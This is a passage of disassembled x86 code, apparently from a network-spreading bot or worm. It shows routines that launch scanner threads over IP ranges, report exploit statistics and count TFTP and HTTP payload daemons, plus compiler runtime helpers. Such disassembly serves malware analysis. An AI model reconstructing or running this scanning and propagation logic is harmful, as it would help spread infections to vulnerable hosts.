sub eax, 0
jz short loc_40269A
dec eax
jz short loc_402680
dec eax
jnz short loc_4026AF
push dword ptr [ebp-64h]
lea eax, [ebp-20h]
push dword ptr [ebp-60h]
push dword ptr [ebp-5Ch]
push offset aD_D_D_x ; "%d.%d.%d.x"
push esi
push eax
call sub_402EBA
add esp, 18h
jmp short loc_4026AF
; ---------------------------------------------------------------------------
loc_402680: ; CODE XREF: sub_4022DF+37Fj
push dword ptr [ebp-60h]
lea eax, [ebp-20h]
push dword ptr [ebp-5Ch]
push offset aD_D_x_x ; "%d.%d.x.x"
push esi
push eax
call sub_402EBA
add esp, 14h
jmp short loc_4026AF
; ---------------------------------------------------------------------------
loc_40269A: ; CODE XREF: sub_4022DF+37Cj
push dword ptr [ebp-5Ch]
lea eax, [ebp-20h]
push offset aD_x_x_x ; "%d.x.x.x"
push esi
push eax
call sub_402EBA
add esp, 10h
loc_4026AF: ; CODE XREF: sub_4022DF+382j
; sub_4022DF+39Fj ...
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_4026B5: ; CODE XREF: sub_4022DF+3DBj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4026B5
loc_4026BC: ; CODE XREF: sub_4022DF+2FCj
sub eax, edx
cmp byte ptr [ebp-41h], 0
mov byte ptr [ebp+eax-20h], 0
mov eax, [ebp-50h]
jz short loc_4026D1
push dword ptr [eax+0Ch]
jmp short loc_4026D4
; ---------------------------------------------------------------------------
loc_4026D1: ; CODE XREF: sub_4022DF+3EBj
push dword ptr [eax+8]
loc_4026D4: ; CODE XREF: sub_4022DF+3F0j
call sub_40416B
push eax
mov eax, [ebp-54h]
imul eax, 2Ch
push dword_424548[eax]
lea eax, [ebp-20h]
push eax
push offset aScanSDUsingDTh ; "Scan: %s:%d Using %d Threads."
push dword ptr [ebp-68h]
push dword ptr [ebp+0Ch]
push offset dword_42851C
call sub_417B51
add esp, 20h
call sub_419B31
mov ecx, [ebp-4Ch]
cmp [ebp-58h], ecx
jnb loc_4027F8
mov eax, [ebp-58h]
imul eax, 124h
sub ecx, [ebp-58h]
mov [ebp-50h], eax
mov [ebp-4Ch], ecx
mov esi, eax
loc_402727: ; CODE XREF: sub_4022DF+513j
push 124h
lea ebx, dword_428858[esi]
lea edi, [ebx-100h]
push 0
push edi
call sub_407F20
lea eax, [ebp-30h]
push eax
push offset dword_420B58
push 0Fh
push ebx
call sub_402EBA
mov eax, ebx
add esp, 1Ch
lea ecx, [eax+1]
loc_402759: ; CODE XREF: sub_4022DF+47Fj
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402759
push dword ptr [ebp-68h]
sub eax, ecx
mov byte ptr dword_428858[esi+eax], dl
mov al, [ebp-41h]
push offset dword_420B58
mov [ebx+12h], al
mov eax, [ebp-48h]
push 0FFh
push edi
mov [ebx+18h], eax
call sub_402EBA
mov eax, edi
add esp, 10h
lea ecx, [eax+1]
loc_402790: ; CODE XREF: sub_4022DF+4B6j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402790
sub eax, ecx
mov byte_428758[esi+eax], dl
mov al, [ebp+0Ch]
mov [ebx+10h], al
mov eax, [ebp-54h]
push 8
mov byte ptr [ebx+11h], 1
mov [ebx+14h], eax
call sub_403417
pop ecx
mov [ebp-58h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_4027DB
mov ecx, edi
push offset sub_413DDD
mov edi, offset aScanner ; "Scanner"
mov esi, eax
call sub_414887
mov esi, [ebp-50h]
jmp short loc_4027DD
; ---------------------------------------------------------------------------
loc_4027DB: ; CODE XREF: sub_4022DF+4E2j
xor eax, eax
loc_4027DD: ; CODE XREF: sub_4022DF+4FAj
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [eax]
add esi, 124h
dec dword ptr [ebp-4Ch]
mov [ebx+20h], eax
mov [ebp-50h], esi
jnz loc_402727
loc_4027F8: ; CODE XREF: sub_4022DF+61j
; sub_4022DF+77j ...
call sub_404A2F
retn 1Ch
sub_4022DF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402800 proc near ; DATA XREF: fabskl8p:off_420EDCo
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
and [esp+1Ch+var_1C], 0
push ebx
push esi
mov ebx, offset dword_4357B8
push edi
mov [esp+28h+var_10], ebx
loc_402819: ; CODE XREF: sub_402800+83j
; sub_402800+A0j ...
mov eax, dword_4357BC
mov eax, [eax]
mov [esp+28h+var_14], eax
mov [esp+28h+var_18], ebx
loc_402828: ; CODE XREF: sub_402800+67j
mov eax, dword_4357BC
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4028BB
mov edi, offset aScanner ; "Scanner"
call sub_40164F
mov esi, eax
add esi, 5
push 8
pop ecx
xor eax, eax
repe cmpsb
lea esi, [esp+28h+var_18]
jz short loc_402869
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_402828
; ---------------------------------------------------------------------------
loc_402869: ; CODE XREF: sub_402800+5Cj
call sub_40164F
mov edi, [eax+40h]
lea esi, [esp+28h+var_18]
call sub_40164F
mov eax, [eax]
call sub_4147FF
test al, al
jz short loc_402819
xor eax, eax
xor ecx, ecx
loc_402889: ; CODE XREF: sub_402800+9Ej
cmp dword_428878[ecx], edi
jz short loc_4028A5
add ecx, 124h
inc eax
cmp ecx, 0CD50h
jbe short loc_402889
jmp loc_402819
; ---------------------------------------------------------------------------
loc_4028A5: ; CODE XREF: sub_402800+8Fj
inc [esp+28h+var_1C]
imul eax, 124h
mov byte_428869[eax], 0
jmp loc_402819
; ---------------------------------------------------------------------------
loc_4028BB: ; CODE XREF: sub_402800+40j
push [esp+28h+var_1C]
push offset aScanAllScanThr ; "Scan: All Scan Threads Stopped. %d kill"...
push [ebp+arg_10]
push [ebp+arg_4]
push offset dword_42851C
call sub_417B51
add esp, 14h
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 1Ch
sub_402800 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=188h
sub_4028E0 proc near ; DATA XREF: fabskl8p:off_420EE4o
var_208 = dword ptr -208h
var_204 = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-188h]
sub esp, 208h
mov eax, dword_423064
xor eax, ebp
mov [ebp+188h+var_4], eax
mov eax, [ebp+188h+arg_10]
push esi
push edi
mov esi, 1FFh
push esi
mov [ebp+188h+var_208], eax
lea eax, [ebp+188h+var_203]
push 0
push eax
mov [ebp+188h+var_204], 0
call sub_407F20
push offset aStatisticsExpl ; "Statistics: Exploits:"
lea eax, [ebp+188h+var_204]
push esi
push eax
xor edi, edi
call sub_402EBA
add esp, 18h
xor eax, eax
loc_402931: ; CODE XREF: sub_4028E0+7Ej
push dword_42454C[eax]
lea eax, dword_424528[eax]
push eax
lea eax, [ebp+188h+var_204]
push eax
push offset aSSD ; "%s %s: %d"
push esi
push eax
call sub_402EBA
add esp, 18h
inc edi
mov eax, edi
imul eax, 2Ch
cmp dword_424548[eax], 0
jnz short loc_402931
lea eax, [ebp+188h+var_204]
push eax
push offset aSDaemons ; "%s; Daemons:"
push esi
push eax
call sub_402EBA
push dword_4354B4
lea eax, [ebp+188h+var_204]
push eax
push offset aSTftpD ; "%s TFTP: %d"
push esi
push eax
call sub_402EBA
push dword_4354A8
lea eax, [ebp+188h+var_204]
push eax
push offset aSHttpD ; "%s HTTP: %d"
push esi
push eax
call sub_402EBA
add esp, 38h
lea eax, [ebp+188h+var_204]
pop edi
lea edx, [eax+1]
pop esi
loc_4029A7: ; CODE XREF: sub_4028E0+CCj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4029A7
sub eax, edx
mov [ebp+eax+188h+var_204], cl
lea eax, [ebp+188h+var_204]
push eax
push offset dword_420B58
push [ebp+188h+var_208]
push [ebp+188h+arg_4]
push offset dword_42851C
call sub_417B51
mov ecx, [ebp+188h+var_4]
xor ecx, ebp
add esp, 14h
call sub_402ADC
add ebp, 188h
leave
retn 1Ch
sub_4028E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029EA proc near ; CODE XREF: sub_41B7A3+A6p
jmp ds:dword_41D1D8
sub_4029EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029F0 proc near ; CODE XREF: sub_41B7A3+149p
jmp ds:dword_41D1D4
sub_4029F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029F6 proc near ; CODE XREF: sub_41B7A3+76p
; sub_41B7A3+B9p ...
jmp ds:dword_41D1D0
sub_4029F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4029FC proc near ; CODE XREF: sub_41B7A3+C8p
; sub_41B7A3+1C3p ...
jmp ds:dword_41D1CC
sub_4029FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402A02 proc near ; CODE XREF: sub_41B7A3+1B4p
jmp ds:dword_41D1C8
sub_402A02 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402A08 proc near ; CODE XREF: sub_414337+88p
; sub_414337+C5p
jmp ds:dword_41D260
sub_402A08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402A0E proc near ; CODE XREF: sub_41AFF3+B2p
jmp ds:dword_41D1C0
sub_402A0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402A14 proc near ; CODE XREF: sub_401C1D+16p
; sub_417776+24p ...
jmp sub_403417
sub_402A14 endp
; =============== S U B R O U T I N E =======================================
sub_402A19 proc near ; DATA XREF: fabskl8p:004215E4o
mov dword ptr [ecx], offset off_41D348
jmp sub_40109A
sub_402A19 endp
; ---------------------------------------------------------------------------
loc_402A24: ; DATA XREF: fabskl8p:off_41D348o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D348
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_402A40
push esi
call sub_403339
pop ecx
loc_402A40: ; CODE XREF: .text:00402A37j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_402A46 proc near ; CODE XREF: sub_401337+Dp
push 44h
mov eax, offset loc_41C8E3
call sub_40497C
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_421CC8
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D33C
call sub_40456B
int 3 ; Trap to Debugger
sub_402A46 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402A85 proc near ; CODE XREF: sub_401141+13p
; sub_4012AC+Fp
push 44h
mov eax, offset loc_41C8E3
call sub_40497C
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_4215E0
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D348
call sub_40456B
int 3 ; Trap to Debugger
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D348
mov eax, esi
pop esi
retn 4
sub_402A85 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402ADC proc near ; CODE XREF: sub_401DA7+9Dp
; sub_401E4D+182p ...
cmp ecx, dword_423064
jnz short loc_402AE6
rep retn
; ---------------------------------------------------------------------------
loc_402AE6: ; CODE XREF: sub_402ADC+6j
jmp sub_404A3E
sub_402ADC endp
; =============== S U B R O U T I N E =======================================
sub_402AEB proc near ; CODE XREF: sub_402BA2+Dp
; sub_402CC5+1Ap ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 0
jnz short loc_402B5D
call sub_40574D
mov [esi+8], eax
mov ecx, [eax+6Ch]
mov [esi], ecx
mov ecx, [eax+68h]
mov [esi+4], ecx
mov ecx, [esi]
cmp ecx, off_423678
jz short loc_402B29
mov ecx, dword_423594
test [eax+70h], ecx
jnz short loc_402B29
call sub_405461
mov [esi], eax
loc_402B29: ; CODE XREF: sub_402AEB+2Aj
; sub_402AEB+35j
mov eax, [esi+4]
cmp eax, dword_423498
jz short loc_402B4A
mov eax, [esi+8]
mov ecx, dword_423594
test [eax+70h], ecx
jnz short loc_402B4A
call sub_404D50
mov [esi+4], eax
loc_402B4A: ; CODE XREF: sub_402AEB+47j
; sub_402AEB+55j
mov eax, [esi+8]
test byte ptr [eax+70h], 2
jnz short loc_402B67
or dword ptr [eax+70h], 2
mov byte ptr [esi+0Ch], 1
jmp short loc_402B67
; ---------------------------------------------------------------------------
loc_402B5D: ; CODE XREF: sub_402AEB+Dj
mov ecx, [eax]
mov [esi], ecx
mov eax, [eax+4]
mov [esi+4], eax
loc_402B67: ; CODE XREF: sub_402AEB+66j
; sub_402AEB+70j
mov eax, esi
pop esi
retn 4
sub_402AEB endp
; =============== S U B R O U T I N E =======================================
sub_402B6D proc near ; CODE XREF: sub_402BA2+86p
; sub_402C75+39j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
push edi
loc_402B77: ; CODE XREF: sub_402B6D+2Ej
movzx eax, byte ptr [esi]
lea ecx, [eax-41h]
inc esi
cmp ecx, 19h
ja short loc_402B86
add eax, 20h
loc_402B86: ; CODE XREF: sub_402B6D+14j
movzx ecx, byte ptr [edx]
lea edi, [ecx-41h]
inc edx
cmp edi, 19h
ja short loc_402B95
add ecx, 20h
loc_402B95: ; CODE XREF: sub_402B6D+23j
test eax, eax
jz short loc_402B9D
cmp eax, ecx
jz short loc_402B77
loc_402B9D: ; CODE XREF: sub_402B6D+2Aj
pop edi
sub eax, ecx
pop esi
retn
sub_402B6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BA2 proc near ; CODE XREF: sub_402C75+45p
; sub_40EB4A+8Fp
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push [ebp+arg_8]
lea ecx, [ebp+var_10]
call sub_402AEB
xor ebx, ebx
cmp [ebp+arg_0], ebx
jnz short loc_402BE9
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402BDF
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402BDF: ; CODE XREF: sub_402BA2+34j
mov eax, 7FFFFFFFh
jmp loc_402C72
; ---------------------------------------------------------------------------
loc_402BE9: ; CODE XREF: sub_402BA2+17j
push edi
mov edi, [ebp+arg_4]
cmp edi, ebx
jnz short loc_402C1C
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402C15
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402C15: ; CODE XREF: sub_402BA2+6Aj
mov eax, 7FFFFFFFh
jmp short loc_402C71
; ---------------------------------------------------------------------------
loc_402C1C: ; CODE XREF: sub_402BA2+4Dj
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_402C31
push edi
push [ebp+arg_0]
call sub_402B6D
pop ecx
pop ecx
jmp short loc_402C65
; ---------------------------------------------------------------------------
loc_402C31: ; CODE XREF: sub_402BA2+80j
push esi
loc_402C32: ; CODE XREF: sub_402BA2+BCj
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_405A0A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_405A0A
add esp, 10h
inc edi
cmp esi, ebx
jz short loc_402C60
cmp esi, eax
jz short loc_402C32
loc_402C60: ; CODE XREF: sub_402BA2+B8j
sub esi, eax
mov eax, esi
pop esi
loc_402C65: ; CODE XREF: sub_402BA2+8Dj
cmp [ebp+var_4], bl
jz short loc_402C71
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_402C71: ; CODE XREF: sub_402BA2+78j
; sub_402BA2+C6j
pop edi
loc_402C72: ; CODE XREF: sub_402BA2+42j
pop ebx
leave
retn
sub_402BA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C75 proc near ; CODE XREF: sub_417E66+34p
; sub_417E66+45p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp dword_427940, esi
jnz short loc_402CB3
cmp [ebp+arg_0], esi
jnz short loc_402CA7
loc_402C88: ; CODE XREF: sub_402C75+35j
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_402CC2
; ---------------------------------------------------------------------------
loc_402CA7: ; CODE XREF: sub_402C75+11j
cmp [ebp+arg_4], esi
jz short loc_402C88
pop esi
pop ebp
jmp sub_402B6D
; ---------------------------------------------------------------------------
loc_402CB3: ; CODE XREF: sub_402C75+Cj
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402BA2
add esp, 0Ch
loc_402CC2: ; CODE XREF: sub_402C75+30j
pop esi
pop ebp
retn
sub_402C75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CC5 proc near ; CODE XREF: sub_402DB5+51p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
push esi
push edi
jz loc_402DAE
push [ebp+arg_C]
lea ecx, [ebp+var_10]
call sub_402AEB
cmp [ebp+arg_0], ebx
jnz short loc_402D17
loc_402CE9: ; CODE XREF: sub_402CC5+57j
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402D0D
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402D0D: ; CODE XREF: sub_402CC5+3Fj
mov eax, 7FFFFFFFh
jmp loc_402DB0
; ---------------------------------------------------------------------------
loc_402D17: ; CODE XREF: sub_402CC5+22j
mov edi, [ebp+arg_4]
cmp edi, ebx
jz short loc_402CE9
mov esi, 7FFFFFFFh
cmp [ebp+arg_8], esi
jbe short loc_402D50
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_402D4C
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_402D4C: ; CODE XREF: sub_402CC5+7Ej
mov eax, esi
jmp short loc_402DB0
; ---------------------------------------------------------------------------
loc_402D50: ; CODE XREF: sub_402CC5+61j
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz short loc_402D75
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_405BD0
add esp, 0Ch
loc_402D67: ; CODE XREF: sub_402CC5+E7j
cmp [ebp+var_4], bl
jz short loc_402DB0
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_402DB0
; ---------------------------------------------------------------------------
loc_402D75: ; CODE XREF: sub_402CC5+91j
; sub_402CC5+E1j
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_405A0A
inc [ebp+arg_0]
mov esi, eax
movzx eax, byte ptr [edi]
lea ecx, [ebp+var_10]
push ecx
push eax
call sub_405A0A
add esp, 10h
inc edi
dec [ebp+arg_8]
jz short loc_402DA8
cmp esi, ebx
jz short loc_402DA8
cmp esi, eax
jz short loc_402D75
loc_402DA8: ; CODE XREF: sub_402CC5+D9j
; sub_402CC5+DDj
sub esi, eax
mov eax, esi
jmp short loc_402D67
; ---------------------------------------------------------------------------
loc_402DAE: ; CODE XREF: sub_402CC5+Ej
xor eax, eax
loc_402DB0: ; CODE XREF: sub_402CC5+4Dj
; sub_402CC5+89j ...
pop edi
pop esi
pop ebx
leave
retn
sub_402CC5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402DB5 proc near ; CODE XREF: sub_41A2D8+D3p
; sub_41A4A6+176p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
xor esi, esi
cmp dword_427940, esi
jnz short loc_402DFC
cmp [ebp+arg_0], esi
jnz short loc_402DE7
loc_402DC8: ; CODE XREF: sub_402DB5+35j
; sub_402DB5+3Ej
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
mov eax, 7FFFFFFFh
jmp short loc_402E0E
; ---------------------------------------------------------------------------
loc_402DE7: ; CODE XREF: sub_402DB5+11j
cmp [ebp+arg_4], esi
jz short loc_402DC8
cmp [ebp+arg_8], 7FFFFFFFh
ja short loc_402DC8
pop esi
pop ebp
jmp sub_405BD0
; ---------------------------------------------------------------------------
loc_402DFC: ; CODE XREF: sub_402DB5+Cj
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402CC5
add esp, 10h
loc_402E0E: ; CODE XREF: sub_402DB5+30j
pop esi
pop ebp
retn
sub_402DB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E11 proc near ; CODE XREF: sub_401C1D+1Ep
; sub_401C1D+40p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_421648
call __SEH_prolog4
xor eax, eax
mov ebx, [ebp+arg_0]
xor edi, edi
cmp ebx, edi
setnz al
cmp eax, edi
jnz short loc_402E4A
call sub_405B83
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402E9D
; ---------------------------------------------------------------------------
loc_402E4A: ; CODE XREF: sub_402E11+1Aj
cmp dword_436974, 3
jnz short loc_402E8B
push 4
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405ED5
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz short loc_402E77
mov esi, [ebx-4]
sub esi, 9
mov [ebp+var_1C], esi
jmp short loc_402E7A
; ---------------------------------------------------------------------------
loc_402E77: ; CODE XREF: sub_402E11+59j
mov esi, [ebp+var_1C]
loc_402E7A: ; CODE XREF: sub_402E11+64j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_402EAB
cmp [ebp+var_20], edi
jnz short loc_402E9B
loc_402E8B: ; CODE XREF: sub_402E11+40j
push ebx
push edi
push dword_427AC8
call ds:dword_41D190 ; RtlSizeHeap
mov esi, eax
loc_402E9B: ; CODE XREF: sub_402E11+78j
mov eax, esi
loc_402E9D: ; CODE XREF: sub_402E11+37j
call __SEH_epilog4
retn
sub_402E11 endp
; =============== S U B R O U T I N E =======================================
sub_402EA3 proc near ; DATA XREF: fabskl8p:00421660o
xor edi, edi
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_402EA3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402EAB proc near ; CODE XREF: sub_402E11+70p
push 4
call sub_405CCF
pop ecx
retn
sub_402EAB endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402EB4 proc near ; CODE XREF: sub_41A6D9+54p
jmp ds:dword_41D194
sub_402EB4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EBA proc near ; CODE XREF: sub_40177B+FEp
; sub_40177B+12Fp ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_402EE5
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402F64
; ---------------------------------------------------------------------------
loc_402EE5: ; CODE XREF: sub_402EBA+Cj
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_402F11
cmp esi, ebx
jnz short loc_402F11
call sub_405B83
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_403305
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_402F63
; ---------------------------------------------------------------------------
loc_402F11: ; CODE XREF: sub_402EBA+34j
; sub_402EBA+38j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_402F20
mov [ebp+var_1C], ecx
loc_402F20: ; CODE XREF: sub_402EBA+61j
push edi
lea eax, [ebp+arg_C]
push eax
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_14], 42h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
call sub_406D87
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_402F62
dec [ebp+var_1C]
js short loc_402F54
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_402F60
; ---------------------------------------------------------------------------
loc_402F54: ; CODE XREF: sub_402EBA+91j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_406B86
pop ecx
pop ecx
loc_402F60: ; CODE XREF: sub_402EBA+98j
mov eax, edi
loc_402F62: ; CODE XREF: sub_402EBA+8Cj
pop edi
loc_402F63: ; CODE XREF: sub_402EBA+55j
pop esi
loc_402F64: ; CODE XREF: sub_402EBA+29j
pop ebx
leave
retn
sub_402EBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402F67 proc near ; CODE XREF: sub_401C1D+CFp
; sub_417776+15Fp ...
jmp sub_403339
sub_402F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F6C proc near ; CODE XREF: sub_40101C+Fp
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+arg_C]
push esi
push edi
xor edi, edi
cmp eax, edi
jz short loc_402FC1
cmp [ebp+arg_0], edi
jnz short loc_402F9A
loc_402F7F: ; CODE XREF: sub_402F6C+31j
call sub_405B83
push 16h
pop esi
mov [eax], esi
loc_402F89: ; CODE XREF: sub_402F6C+44j
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
mov eax, esi
jmp short loc_402FC3
; ---------------------------------------------------------------------------
loc_402F9A: ; CODE XREF: sub_402F6C+11j
cmp [ebp+arg_8], edi
jz short loc_402F7F
cmp [ebp+arg_4], eax
jnb short loc_402FB2
call sub_405B83
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402F89
; ---------------------------------------------------------------------------
loc_402FB2: ; CODE XREF: sub_402F6C+36j
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407720
add esp, 0Ch
loc_402FC1: ; CODE XREF: sub_402F6C+Cj
xor eax, eax
loc_402FC3: ; CODE XREF: sub_402F6C+2Cj
pop edi
pop esi
pop ebp
retn
sub_402F6C endp
; =============== S U B R O U T I N E =======================================
sub_402FC7 proc near ; CODE XREF: sub_401065+11p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_41D37C
retn
sub_402FC7 endp
; =============== S U B R O U T I N E =======================================
sub_402FD8 proc near ; CODE XREF: sub_4015ED+2Fp
; sub_40BDB6+15Dp
arg_0 = dword ptr 4
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, ecx
mov dword ptr [edi], offset off_41D37C
mov eax, [ebx]
test eax, eax
jz short loc_403013
push eax
call sub_4044E0
mov esi, eax
inc esi
push esi
call sub_403AAC
test eax, eax
pop ecx
pop ecx
mov [edi+4], eax
jz short loc_403017
push dword ptr [ebx]
push esi
push eax
call sub_407A85
add esp, 0Ch
jmp short loc_403017
; ---------------------------------------------------------------------------
loc_403013: ; CODE XREF: sub_402FD8+13j
and dword ptr [edi+4], 0
loc_403017: ; CODE XREF: sub_402FD8+2Bj
; sub_402FD8+39j
mov dword ptr [edi+8], 1
mov eax, edi
pop edi
pop esi
pop ebx
retn 4
sub_402FD8 endp
; =============== S U B R O U T I N E =======================================
sub_403026 proc near ; CODE XREF: sub_4033FE+Ap
arg_0 = dword ptr 4
mov eax, ecx
mov ecx, [esp+arg_0]
mov dword ptr [eax], offset off_41D37C
mov ecx, [ecx]
and dword ptr [eax+8], 0
